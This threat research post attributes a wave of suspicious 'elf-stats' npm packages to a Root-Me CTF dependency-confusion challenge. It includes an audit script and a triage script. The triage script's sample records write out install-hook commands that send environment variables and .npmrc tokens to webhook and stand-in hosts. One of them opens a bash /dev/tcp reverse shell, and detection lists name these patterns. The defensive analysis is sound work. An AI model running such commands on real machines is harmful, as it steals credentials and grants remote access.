Elf on a (npm) Shelf
Panther Threat Research Team
Dec 3, 2025
Executive Summary
On December 3, 2025, Socket.dev reported a surge of 432+ malicious npm packages with “elf-stats” naming patterns, initially flagged as a potential coordinated threat actor campaign. Through comprehensive behavioral analysis, infrastructure mapping, and temporal correlation, we have definitively attributed this activity to Root-Me’s XMAS CTF 2025 Day 3 challenge: “Confusion among the Elves,” a dependency confusion educational exercise designed by challenge author Cezame.
What Socket.dev Found
Socket.dev’s initial analysis correctly identified:
432+ malicious npm packages with elf-themed naming
Publication timing: Concentrated on December 3, 2025
Automated generation: Packages published every ~2 minutes
French connection: Author “cezame” and French language indicators
Malicious behaviors: Reverse shells, data exfiltration, credential harvesting
Multiple threat actors: Different naming schemes and automation patterns
Their analysis astutely noted: “Given the coordination and breadth of the behavior, it is possible there is more than one threat actor.”
What they couldn’t confirm: Whether this was legitimate security research, a CTF exercise, or actual malicious activity.
New Findings: The Complete Picture
Definitive Source Attribution
Root-Me XMAS CTF 2025 - Day 3 Challenge
“Every winter, the elves’ factory relies on a massive statistics system to optimize gift production… DevSecOops the elf spilled his eggnog… Your mission? Find a way to recover the list by accessing the production server!”

Several indicators link the packages to this challenge. The first package was published roughly 25 minutes after the challenge went live. All of the packages carry "Elf Workshop" strings in several fields, including the author field. The challenge author is "cezame", and nothing we have observed suggests that account is a malicious actor. The package descriptions also state explicitly that these are automated packages and tests for the Root-Me challenge.
As of the time of writing the “Confusion among the Elves” challenge has been removed by Root-Me staff.
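The technique the challenge teaches is dependency confusion: npm resolves an unscoped package name against whatever registry .npmrc configures (registry.npmjs.org by default), so an internal name that nobody has reserved on the public registry can be published there by anyone, and any install hook it carries runs on the machine that installs it. The audit below is an added example, not code from the challenge, from Root-Me or from Panther. It takes a constructed package.json, .npmrc and list of internal package names (all hypothetical) plus an offline stand-in for the public registry, and reports which internal dependencies npm would actually fetch from the public registry.

```python
"""Audit a package.json / .npmrc pair for dependency-confusion exposure.

Added example, not Root-Me's challenge code or Panther's tooling. The manifest,
.npmrc, internal package names and the public-registry stand-in below are all
constructed for illustration.
"""
import json

PUBLIC_REGISTRY_URL = "https://registry.npmjs.org/"

# Constructed manifest: two unscoped internal packages and one scoped one.
PACKAGE_JSON = """{
  "name": "elf-factory-dashboard",
  "version": "1.4.0",
  "dependencies": {
    "express": "^4.19.0",
    "elf-stats-core": "^2.1.0",
    "@elfworkshop/telemetry": "^1.0.3",
    "elf-gift-scheduler": "~0.9.0"
  }
}"""

# Constructed .npmrc: only the @elfworkshop scope is pinned to the private registry.
NPMRC = """registry=https://registry.npmjs.org/
@elfworkshop:registry=https://npm.internal.example/
//npm.internal.example/:_authToken=${NPM_TOKEN}
"""

# Constructed: names the organisation only ever publishes internally.
INTERNAL_NAMES = {"elf-stats-core", "elf-gift-scheduler", "@elfworkshop/telemetry"}

# Constructed stand-in for the public registry so the example runs offline.
# A real check would GET https://registry.npmjs.org/<name> and treat 404 as "unclaimed".
PUBLIC_REGISTRY = {"express": "4.19.2", "elf-stats-core": "2.9.0"}


def parse_npmrc(text):
    """Return the default registry and a {scope: registry} map from .npmrc lines."""
    default, scopes = PUBLIC_REGISTRY_URL, {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(("#", ";")) or "=" not in line:
            continue  # comments and blanks
        key, value = (part.strip() for part in line.split("=", 1))
        if key == "registry":
            default = value
        elif key.startswith("@") and key.endswith(":registry"):
            scopes[key[: -len(":registry")]] = value
        # auth-token and other keys carry no routing information and are ignored
    return default, scopes


def resolve_registry(name, default, scopes):
    """Registry npm consults for this name: the scope's registry if pinned, else the default."""
    if name.startswith("@"):
        return scopes.get(name.split("/", 1)[0], default)
    return default


def audit(package_json, npmrc, internal_names, public_registry):
    """Flag internal dependencies that npm would fetch from the public registry."""
    deps = json.loads(package_json).get("dependencies", {})
    default, scopes = parse_npmrc(npmrc)
    findings = []
    for name in sorted(deps):
        if name not in internal_names:
            continue  # genuinely public dependency, out of scope here
        if resolve_registry(name, default, scopes) != PUBLIC_REGISTRY_URL:
            continue  # pinned to the private registry, no confusion possible
        if name in public_registry:
            findings.append({"name": name, "severity": "critical",
                             "reason": f"exists on the public registry at {public_registry[name]}; "
                                       "npm installs that copy, not the internal one"})
        else:
            findings.append({"name": name, "severity": "high",
                             "reason": "unclaimed on the public registry; anyone can publish it"})
    return findings


if __name__ == "__main__":
    for finding in audit(PACKAGE_JSON, NPMRC, INTERNAL_NAMES, PUBLIC_REGISTRY):
        print(f"[{finding['severity']}] {finding['name']}: {finding['reason']}")
```

The scoped dependency passes because its scope is routed to the private registry; the two unscoped internal names do not, and nothing in .npmrc can pin an unscoped name to one registry. The usual remediations are to move internal packages under a scope that .npmrc pins to the private registry, or to claim the unscoped names on the public registry as placeholders, and to run installs with `--ignore-scripts` where install hooks are not needed.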

Participant Behavior Stratification
Our analysis of 144 packages from 54 unique participants reveals three distinct competitor categories: manual, semi-automated, and fully automated. Participants uploading payloads by hand may be first-time CTF players, while those who semi- or fully automated publication show greater technical skill. This spread of skill across the same payload types makes it unlikely that the publishers belong to a single attacker group running a coordinated campaign.


This skill stratification is the strongest single indicator that this was a competitive CTF rather than a coordinated attack: a threat actor running one campaign would standardize its tooling, whereas CTF participants show natural variance based on experience level.
Infrastructure Analysis
Exfiltration Service Distribution
| Service Type | Package Count | Typical Use Case | Risk Profile |
|---|---|---|---|
| webhook.site | 62 | Developer testing | Free, public, logged |
| Discord webhooks | 28 | Community chat | Requires account, semi-public |
| xmasctf2025flag.* | 6 | CTF flag collection | CTF indicator |
| requestcatcher.com | 4 | API testing | Free, temporary |
| ngrok tunnels | 3 | Local dev tunneling | Ephemeral infrastructure |
| beeceptor.com | 2 | Mock API service | Developer tool |
Threat actors commonly use all of these free services as exfiltration and command-and-control infrastructure. Even where a service logs requests or requires an account, an actor can create and recreate accounts as quickly as the provider identifies and removes them. The explicit xmasctf2025flag domain used in some packages could equally have been a false flag planted by a threat actor to pose as an educational CTF activity. This is why attribution has to correlate across multiple indicators rather than rely on any one of them, and it shows that CTF participants learn from threat actors and vice versa.
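To show what this kind of preliminary triage looks like in code, and to tie together the service table above, the publisher stratification and the publish-timing analysis, here is an added example that is not Panther's or Socket.dev's tooling. It runs over a handful of constructed package records: it pulls URLs out of install hooks, maps their hosts to the service categories in the table, tags the coarse behaviours Socket.dev listed, and buckets each publishing account as manual, semi-automated or fully automated by the median gap between its publishes. The records, publisher names, URLs, hostname patterns, behaviour hints and cadence thresholds are all assumptions of the example.

```python
"""Triage a batch of suspicious npm publishes: which service each install hook
talks to, what the hook appears to do, and how mechanically each account published.

Added example, not Panther's or Socket.dev's tooling. The records, service patterns,
behaviour hints and cadence thresholds below are constructed assumptions.
"""
import re
from collections import Counter, defaultdict
from datetime import datetime
from statistics import median
from urllib.parse import urlparse

URL_RE = re.compile(r"https?://[^\s'\"`)]+")

# Hostname patterns for the exfiltration services in the table (assumed patterns).
SERVICE_PATTERNS = [
    ("webhook.site", re.compile(r"(^|\.)webhook\.site$")),
    ("Discord webhooks", re.compile(r"(^|\.)discord(app)?\.com$")),
    ("xmasctf2025flag.*", re.compile(r"^xmasctf2025flag\.")),
    ("requestcatcher.com", re.compile(r"(^|\.)requestcatcher\.com$")),
    ("ngrok tunnels", re.compile(r"(^|\.)ngrok(-free)?\.(io|app|dev)$")),
    ("beeceptor.com", re.compile(r"(^|\.)beeceptor\.com$")),
]

# Substrings hinting at the behaviours Socket.dev listed (coarse heuristics, not a detector).
BEHAVIOR_HINTS = {
    "reverse shell": ("/dev/tcp/", "nc -e", "bash -i"),
    "credential harvesting": (".npmrc", "_authToken", ".aws/credentials", ".ssh/", "process.env"),
}
INSTALL_HOOKS = ("preinstall", "install", "postinstall")

# Seconds between consecutive publishes from one account (assumed thresholds).
AUTOMATED_MAX_GAP = 180        # roughly the ~2 minute cadence Socket.dev observed
SEMI_AUTOMATED_MAX_GAP = 1800


def classify_service(url):
    """Map an exfiltration URL to one of the service categories, or 'other'."""
    parsed = urlparse(url)
    host = (parsed.hostname or "").lower()
    for label, pattern in SERVICE_PATTERNS:
        if pattern.search(host):
            # A Discord host only counts as a webhook sink when the webhook API path is used.
            if label == "Discord webhooks" and "/api/webhooks/" not in parsed.path:
                return "other"
            return label
    return "other"


def classify_behavior(hook_script):
    """Return sorted behaviour labels suggested by an install hook's contents."""
    labels = [label for label, needles in BEHAVIOR_HINTS.items()
              if any(needle in hook_script for needle in needles)]
    if URL_RE.search(hook_script):
        labels.append("data exfiltration")  # any outbound URL in an install hook
    return sorted(labels)


def publisher_mode(publish_times):
    """Bucket an account as manual, semi-automated or fully-automated by publish cadence."""
    times = sorted(publish_times)
    if len(times) < 2:
        return "manual"
    gap = median((later - earlier).total_seconds() for earlier, later in zip(times, times[1:]))
    if gap <= AUTOMATED_MAX_GAP:
        return "fully-automated"
    return "semi-automated" if gap <= SEMI_AUTOMATED_MAX_GAP else "manual"


def triage(records):
    """Aggregate service, behaviour and publisher-cadence counts over package records."""
    services, behaviors, by_publisher = Counter(), Counter(), defaultdict(list)
    for rec in records:
        hooks = " ".join(rec["scripts"].get(hook, "") for hook in INSTALL_HOOKS)
        for url in URL_RE.findall(hooks):
            services[classify_service(url)] += 1
        for label in classify_behavior(hooks):
            behaviors[label] += 1
        by_publisher[rec["publisher"]].append(datetime.fromisoformat(rec["published"]))
    modes = {publisher: publisher_mode(times) for publisher, times in by_publisher.items()}
    return {"services": dict(services), "behaviors": dict(behaviors), "publisher_modes": modes}


def _record(name, publisher, published, postinstall):
    return {"name": name, "publisher": publisher, "published": published,
            "scripts": {"postinstall": postinstall}}


# Constructed records; publisher names, URLs and timestamps are hypothetical.
SAMPLE_RECORDS = [
    _record(f"elf-stats-a{i}", "alice-hypothetical", f"2025-12-03T11:{2 * i:02d}:00+00:00",
            "curl -s -X POST -d \"$(hostname):$(whoami)\" https://webhook.site/0000-aaaa")
    for i in range(1, 5)
] + [
    _record("elf-stats-b", "bob-hypothetical", "2025-12-03T12:31:00+00:00",
            "node -e \"fetch('https://discord.com/api/webhooks/1/x',"
            "{method:'POST',body:JSON.stringify(process.env)})\""),
    _record("elf-stats-c1", "carol-hypothetical", "2025-12-03T13:10:00+00:00",
            "curl -s -d @$HOME/.npmrc https://xmasctf2025flag.example/upload"),
    _record("elf-stats-c2", "carol-hypothetical", "2025-12-03T13:25:00+00:00",
            "bash -i >& /dev/tcp/10.0.0.1/4444 0>&1; curl https://xmasctf2025flag.example/done"),
]

if __name__ == "__main__":
    for section, counts in triage(SAMPLE_RECORDS).items():
        print(section, counts)
```

On the constructed records the four two-minute publishes land in the fully-automated bucket, the single publish in the manual bucket, and the two publishes fifteen minutes apart in the semi-automated one. Against a real batch the records would come from the registry's package metadata (the `time` and `scripts` fields of each version document), and the hint lists would be tuned to what the batch actually contains.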
The French Cybersecurity Education Ecosystem
EPITA Connection
Socket.dev noted French language indicators. One of the emails we collected from NPM users belongs to École Pour l’Informatique et les Techniques Avancées (EPITA), an engineering institute with a focus on computer science.
Root-Me Platform Context
Root-Me (root-me.org) is a French cybersecurity training platform founded in 2010 that lets users practice on over 400 challenges across domains such as cryptography, forensics, networks, and systems. The community has more than 500,000 users worldwide and is currently running an XMAS CTF, an advent calendar from Dec 1 to Dec 24 with one challenge per day.
Timeline Reconstruction
Based on the temporal distribution of package publication, a coordinated attack is unlikely: the publishes are spread across several hours in successive waves of new participants rather than released in a single burst.
Participant Entry Pattern:
Early adopters (11:00-12:00): 18% of participants — immediate engagement
Lunch break wave (12:00-13:00): 33% of participants — lunch-break competition
Main competition (13:00-15:00): 40% of participants — prime competitive window
Late solvers (15:00-16:39): 9% of participants — slower problem solvers
Package Metadata: The “Elf Workshop” Shared Identity
Socket.dev noted the “Elf Workshop” author field appearing across multiple packages. Our analysis reveals this was a challenge-suggested fake identity, not evidence of coordination:
Author Field Distribution:
| Author Value | Package Count | Interpretation |
|---|---|---|
| "Elf Workshop" | 60 (41.7%) | Suggested by challenge narrative |
| null/empty | 64 (44.4%) | Participants who skipped the author field |
| Creative variations | 12 (8.3%) | "Santa Hacker Team", "Miguel the Elf" |
| Placeholder values | 8 (5.6%) | "test", "you", "me", "ctf-exploit" |
Given that the challenge description references an “elves’ factory”, it is possible that the “Elf Workshop” is a string marking for CTF staff and participants to keep track of users undergoing the challenge.
The Cleanup Gap
Despite the challenge author Cezame's explicit instruction to "clean up any files you create for this challenge—especially on external services—to avoid any hypothetical issues with your accounts," 144 packages remained live when Socket.dev conducted their analysis. This creates an interesting operational question.
The cleanup instruction appears to require individual action: Root-Me organizers likely lack access to participants' personal npm accounts (gmail.com, proton.me, etc.) to perform mass removal. Three factors may explain the incomplete cleanup: participant inexperience (37% were manual/beginner participants who may not understand npm unpublishing procedures or assumed organizers would handle it), technical barriers (forgotten credentials on throwaway accounts, or participants who published only 1-2 packages and moved on), and incentive misalignment (no scoring penalty for leaving packages, no cleanup automation provided).
It's also worth noting that the challenge was posted only hours before Socket.dev's analysis. Participants may simply not have cleaned up yet. The timing ambiguity in Cezame's instruction (cleanup immediately vs. after December 25th when write-ups are allowed) may have contributed to delayed action. However, the practical impact is clear: npm is already expending resources to manually remove these packages, creating operational burden on registry maintainers even for authorized educational exercises.
Implications for Supply Chain Security
This gap highlights a broader challenge for supply chain security education: realistic exercises require publishing to real registries, but incomplete cleanup pollutes the ecosystem and consumes security team resources investigating what ultimately proves to be legitimate educational activity.
Given the recent Sha1-Hulud campaign in the npm ecosystem, npm packages are drawing close scrutiny from the security community, and for good reason. For security vendors, catching malicious code while managing false positives is a delicate balance. Preliminary analysis, triage, and attribution are therefore critical, so that alarms are not raised at the first hint of suspicious activity.
Conclusion
The “Elves on npm” campaign was not a sophisticated threat actor operation, but rather 54 individual cybersecurity students and professionals competing in Root-Me’s XMAS CTF 2025, Day 3 challenge: “Confusion among the Elves.” This dependency confusion exercise, designed by challenge author Cezame, successfully taught supply chain attack techniques to a diverse international participant base with varying skill levels.
As supply chain security education grows, the industry must develop frameworks to support realistic exercises without creating collateral confusion. The alternative—avoiding public registries entirely—reduces educational value by removing real-world complexity.
This incident is not a failure of education or detection, but rather a case study in the growing pains of security monitoring in public ecosystems.
References
Socket.dev. (2025). “npm Sees Surge of Auto-Generated ‘elf-stats’ Packages.” https://socket.dev/blog/elves-on-npm
Root-Me. (2025). “XMAS CTF 2025.” https://ctf.xmas.root-me.org/